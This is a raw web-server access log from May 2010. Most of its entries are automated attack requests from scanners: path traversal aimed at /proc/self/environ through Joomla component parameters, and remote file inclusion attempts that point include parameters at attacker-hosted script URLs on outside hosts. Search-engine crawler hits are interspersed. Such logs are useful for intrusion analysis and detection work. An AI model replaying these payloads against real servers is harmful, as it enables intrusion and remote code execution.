72.51.42.60 - - [20/May/2010:11:00:38 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.14.125.163 - - [20/May/2010:11:02:21 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:02:22 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:02:22 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:02:25 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:02:25 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:02:26 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
89.185.231.103 - - [20/May/2010:11:03:40 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
89.185.231.103 - - [20/May/2010:11:03:40 -0500] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
89.185.231.103 - - [20/May/2010:11:04:13 -0500] "GET /logs/access_log.1271548800//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.121.213.196 - - [20/May/2010:11:04:34 -0500] "GET /logs/index2.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.213.196 - - [20/May/2010:11:04:34 -0500] "GET /index2.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.185.231.103 - - [20/May/2010:11:04:36 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
89.185.231.103 - - [20/May/2010:11:04:36 -0500] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
89.185.231.103 - - [20/May/2010:11:04:36 -0500] "GET /logs/access_log.1272844800%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:11:05:24 -0500] "GET /logs/access_log.1171756800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
89.185.231.103 - - [20/May/2010:11:05:44 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
89.185.231.103 - - [20/May/2010:11:05:44 -0500] "GET /logs/access_log.1271548800//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
89.185.231.103 - - [20/May/2010:11:05:44 -0500] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.252.3.123 - - [20/May/2010:11:06:19 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
87.252.3.123 - - [20/May/2010:11:06:19 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
85.214.25.33 - - [20/May/2010:11:06:42 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:11:06:43 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
67.195.112.180 - - [20/May/2010:11:07:15 -0500] "GET /logs/access_log.1187308800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.14.125.163 - - [20/May/2010:11:08:09 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:08:09 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:08:09 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:08:09 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:08:09 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:08:09 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:08:12 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:08:12 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:08:12 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.121.158.187 - - [20/May/2010:11:08:13 -0500] "GET /logs/access_log.1271548800///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
174.121.158.187 - - [20/May/2010:11:08:13 -0500] "GET ///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
174.121.158.187 - - [20/May/2010:11:08:13 -0500] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
216.14.125.163 - - [20/May/2010:11:08:28 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:08:29 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:08:29 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:08:34 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:08:35 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:08:35 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:09:23 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:09:23 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.125.163 - - [20/May/2010:11:09:23 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
207.46.199.50 - - [20/May/2010:11:09:35 -0500] "GET /logs/access_log.1237507200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.214.25.33 - - [20/May/2010:11:09:39 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:11:09:39 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:11:09:39 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:11:09:39 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:11:09:39 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6273 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:11:09:40 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6273 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:11:10:17 -0500] "GET /logs/access_log.1204588800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
85.214.25.33 - - [20/May/2010:11:10:42 -0500] "GET /logs/access_log.1273276800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:11:10:42 -0500] "GET /logs/access_log.1273276800/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:11:10:43 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:11:10:43 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:11:10:43 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6273 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:11:10:43 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6273 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:11:11:31 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:11:11:31 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:11:13:45 -0500] "GET /logs/access_log.1271548800//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
88.191.94.188 - - [20/May/2010:11:13:45 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
88.191.94.188 - - [20/May/2010:11:13:45 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 295 "-""Mozilla/5.0"
88.191.94.188 - - [20/May/2010:11:14:23 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 295 "-""Mozilla/5.0"
88.191.94.188 - - [20/May/2010:11:14:23 -0500] "GET /logs/access_log.1271548800//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
88.191.94.188 - - [20/May/2010:11:14:23 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
85.214.25.33 - - [20/May/2010:11:16:01 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
85.214.25.33 - - [20/May/2010:11:16:03 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:11:16:08 -0500] "GET /logs/access_log.1199664000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.121.158.187 - - [20/May/2010:11:18:41 -0500] "GET ///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://163.20.166.223:8080/appserv/1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
174.121.158.187 - - [20/May/2010:11:18:41 -0500] "GET /logs///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://163.20.166.223:8080/appserv/1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
174.121.158.187 - - [20/May/2010:11:18:41 -0500] "GET /logs/access_log.1271548800///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://163.20.166.223:8080/appserv/1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
174.121.158.187 - - [20/May/2010:11:18:45 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://163.20.166.223:8080/appserv/1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
174.121.158.187 - - [20/May/2010:11:18:45 -0500] "GET /logs/access_log.1271548800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://163.20.166.223:8080/appserv/1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
174.121.158.187 - - [20/May/2010:11:18:45 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://163.20.166.223:8080/appserv/1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:19:00 -0500] "GET //admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:19:02 -0500] "GET /logs/access_log.1262563200//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:19:06 -0500] "GET /logs/access_log.1271548800//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:19:06 -0500] "GET /logs//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:19:44 -0500] "GET /logs/access_log.1264032000//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.232.143.238 - - [20/May/2010:11:19:55 -0500] "GET //admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.232.143.238 - - [20/May/2010:11:19:55 -0500] "GET /logs/access_log.1271548800//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.232.143.238 - - [20/May/2010:11:19:55 -0500] "GET /logs//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
66.232.143.238 - - [20/May/2010:11:19:55 -0500] "GET /logs/access_log.1262563200//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.232.143.238 - - [20/May/2010:11:20:12 -0500] "GET /logs/access_log.1264032000//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:21:04 -0500] "GET //admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:21:04 -0500] "GET /logs//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:21:04 -0500] "GET /logs/access_log.1262563200//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:21:13 -0500] "GET /logs/access_log.1271548800//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:21:17 -0500] "GET //admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:21:38 -0500] "GET /logs//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:22:34 -0500] "GET /logs/access_log.1264032000//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:22:34 -0500] "GET /logs/access_log.1262563200//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:22:47 -0500] "GET /logs/access_log.1264032000//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:11:25:53 -0500] "GET /logs/access_log.1200355200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.52 - - [20/May/2010:11:26:04 -0500] "GET /logs/access_log.1197158400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.239.161.143 - - [20/May/2010:11:29:18 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
211.239.161.143 - - [20/May/2010:11:29:19 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
211.239.161.143 - - [20/May/2010:11:31:42 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
211.239.161.143 - - [20/May/2010:11:31:42 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
87.250.255.243 - - [20/May/2010:11:31:44 -0500] "GET /logs/access_log.1185321600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.127.70.140 - - [20/May/2010:11:32:14 -0500] "GET //admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:32:15 -0500] "GET /logs/access_log.1271548800//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:32:37 -0500] "GET /logs//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:34:24 -0500] "GET /logs/access_log.1262563200//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.127.70.140 - - [20/May/2010:11:34:51 -0500] "GET /logs/access_log.1264032000//admin/auth.php?xcart_dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:11:35:47 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:11:35:47 -0500] "GET //skin/zero_vote/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:11:35:47 -0500] "GET /logs/access_log.1271548800//skin/zero_vote/error.php?dir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
58.125.181.214 - - [20/May/2010:11:36:22 -0500] "GET /logs/access_log.1237420800%20%20/?format_menue=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.125.181.214 - - [20/May/2010:11:36:22 -0500] "GET /?format_menue=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
58.125.181.214 - - [20/May/2010:11:36:22 -0500] "GET /logs/?format_menue=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 200 6273 "-""Mozilla/5.0"
211.239.161.143 - - [20/May/2010:11:36:39 -0500] "GET /manager/admin/p_ins.php?MGR=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
211.239.161.143 - - [20/May/2010:11:36:40 -0500] "GET /logs/manager/admin/p_ins.php?MGR=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
